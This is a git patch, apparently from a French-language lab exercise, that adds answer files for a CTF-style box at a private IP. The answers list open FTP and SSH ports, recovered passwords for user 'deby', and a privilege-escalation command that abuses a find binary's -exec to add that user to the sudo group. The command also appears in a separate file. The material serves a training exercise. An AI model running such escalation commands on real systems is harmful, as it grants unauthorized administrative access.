From 7ff7a808dca5e103586ab0b447390aff83300d50 Mon Sep 17 00:00:00 2001 From: ExostFlash Date: Thu, 5 Jun 2025 13:20:49 +0200 Subject: [PATCH] Final modif --- Felicitation.txt | 3 +++ answers.txt | 26 ++++++++++++++++++++++++++ np/commandeBash.txt | 1 + np/commandeFTP.txt | 1 + 4 files changed, 31 insertions(+) create mode 100644 Felicitation.txt create mode 100644 answers.txt create mode 100644 np/commandeBash.txt create mode 100644 np/commandeFTP.txt diff --git a/Felicitation.txt b/Felicitation.txt new file mode 100644 index 0000000..bd5144f --- /dev/null +++ b/Felicitation.txt @@ -0,0 +1,3 @@ +Bravo à tous pour avoir terminé le TP ! + +Continuez comme ça ! \ No newline at end of file diff --git a/answers.txt b/answers.txt new file mode 100644 index 0000000..8a86fbf --- /dev/null +++ b/answers.txt @@ -0,0 +1,26 @@ +1. + +ip: 192.168.56.55 +port: 22 et 21 + +2. + +connexion ftp + +3. + +mdp: yzhxvq +cle: IJDK + +devien: python + +user: deby +mdp: python + +4. + +./find . -exec /usr/sbin/usermod -aG sudo deby \; -quit + +5. + +reussi !!! \ No newline at end of file diff --git a/np/commandeBash.txt b/np/commandeBash.txt new file mode 100644 index 0000000..13452c4 --- /dev/null +++ b/np/commandeBash.txt @@ -0,0 +1 @@ +./find . -exec /usr/sbin/usermod -aG sudo deby \; -quit \ No newline at end of file diff --git a/np/commandeFTP.txt b/np/commandeFTP.txt new file mode 100644 index 0000000..5fb5806 --- /dev/null +++ b/np/commandeFTP.txt @@ -0,0 +1 @@ +ftp 192.168.56.55 \ No newline at end of file